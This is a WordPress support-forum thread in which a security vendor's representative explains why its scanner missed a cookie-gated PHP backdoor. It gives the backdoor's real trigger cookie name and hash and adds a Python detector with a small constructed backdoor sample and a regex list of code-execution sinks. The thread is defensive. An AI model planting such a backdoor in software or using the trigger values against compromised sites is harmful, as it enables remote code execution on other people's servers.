Viewing 4 replies - 1 through 4 (of 4 total)
  • That is because, among the six file system scanners implemented in the plugin, only one checks for malicious code; the other scanners only check the integrity of the files, and that only applies to the WordPress core files, so everything inside the content folder is ignored.

    Now, for the malware scanner: it only runs when the user executes it; it does not run in the background, you need to click a button to execute it from the administrator panel. If you ran the malware scanner and it did not report any malicious code, then it is because SiteCheck (which is the service that powers the Malware Scan page) does not check the content of the files (because that would require full access to your hosting account, and we are not requesting that level of access from the plugin) but instead checks the rendered code of those files, so if the malware is smart enough to hide from a web scanner then it will not be flagged by the plugin.

    The story is different if you are using the “Server Side Scanner”, which is another service offered by Sucuri.net, but it is a premium service, so you will need to pay to use it.

    If you do not mind, I would appreciate having a copy of the malware that you found in that “index.php” file; I will forward it to our research team and it will be added to our signature database.

    Thread Starter DaveKoe

    (@davekoe)

    Thanks for following up.

    Here is one example of malicious code that I have found.

    https://pastebin.com/9FQg8UQq

    Scroll to the bottom

    I just decoded the malware and here it is [1]. As you can see (I do not know if you understand PHP code), the script allows an attacker to execute arbitrary code, but the person needs to set a cookie with this name [2] and set a value that, encoded in md5, must match this string [3]. That is why our malware scanner could not catch the script: because (as I explained in my previous message) SiteCheck only scans the rendered HTML code, and considering that the name of the cookie is random, it will be difficult to guess using an automated tool.

    I ran our “Server Side Scanner” [4] over that malicious script and it not only detected it but also cleaned the file, so our premium scanner could have detected the malicious code.

    [1] Original: https://pastebin.sucuri.net/en53j19so7cyt
    [1] Decoded: https://pastebin.sucuri.net/6tio4hqm321v8y
    [2] Cookie name: "8elc06hx"
    [3] Cookie value: "346ad0470722074b394f4fb03dddbe99"
    [4] Sucuri Web AntiVirus
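The reply above explains why a scanner that only looks at rendered HTML misses a backdoor that stays silent until a specific cookie is presented. The following is an added example, not code from the Sucuri plugin or from the thread's pastebin, of a file-content heuristic that a defender can run over the content folder: it flags a PHP file only when a cookie read, a hard-coded hash comparison and a code-execution sink all occur together. The sample PHP sources, the cookie name and the hash are constructed for the example.

```python
import re
from typing import Dict, List

# Each pattern is one indicator of the shape described in the thread:
# the script reads a cookie, hashes it, compares against a fixed digest,
# and only then reaches a sink that executes attacker-supplied data.
INDICATORS = {
    "cookie_read": re.compile(r"\$_COOKIE\s*\[", re.I),
    "hash_compare": re.compile(
        r"\b(md5|sha1|crc32)\s*\([^)]*\)\s*={2,3}\s*['\"][0-9a-f]{8,40}['\"]", re.I),
    "exec_sink": re.compile(
        r"\b(eval|assert|system|shell_exec|passthru|exec|create_function)\s*\(", re.I),
}

def scan_php_source(src: str) -> Dict[str, bool]:
    """Return which indicators fire on the given PHP source text."""
    return {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}

def is_cookie_gated_backdoor(src: str) -> bool:
    """Flag only when the gate (cookie + hash check) and a sink co-occur,
    which keeps ordinary cookie-reading theme code from being reported."""
    hits = scan_php_source(src)
    return hits["cookie_read"] and hits["hash_compare"] and hits["exec_sink"]

def scan_files(files: Dict[str, str]) -> List[str]:
    """Given {path: source}, return the paths that look like cookie-gated backdoors."""
    return [path for path, src in files.items() if is_cookie_gated_backdoor(src)]

# Constructed samples (placeholder cookie name and digest, not the thread's values).
SAMPLE_BACKDOOR = '''<?php
if (isset($_COOKIE["k3y"]) && md5($_COOKIE["k3y"]) == "0123456789abcdef0123456789abcdef") {
    eval(base64_decode($_POST["p"]));
}
?>'''

SAMPLE_BENIGN = '''<?php
// Normal theme code: remembers a UI preference in a cookie, no code execution.
$theme = isset($_COOKIE["theme"]) ? $_COOKIE["theme"] : "light";
echo "<body class=\\"" . htmlspecialchars($theme) . "\\">";
?>'''

if __name__ == "__main__":
    files = {"wp-content/index.php": SAMPLE_BACKDOOR,
             "wp-content/themes/x/header.php": SAMPLE_BENIGN}
    for path in scan_files(files):
        print("suspicious:", path)
```

A real run would read each `.php` under `wp-content/` from disk; the point is that the file content, not the page output, is what exposes this pattern.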

    Thread Starter DaveKoe

    (@davekoe)

    Good to know. Thanks again.
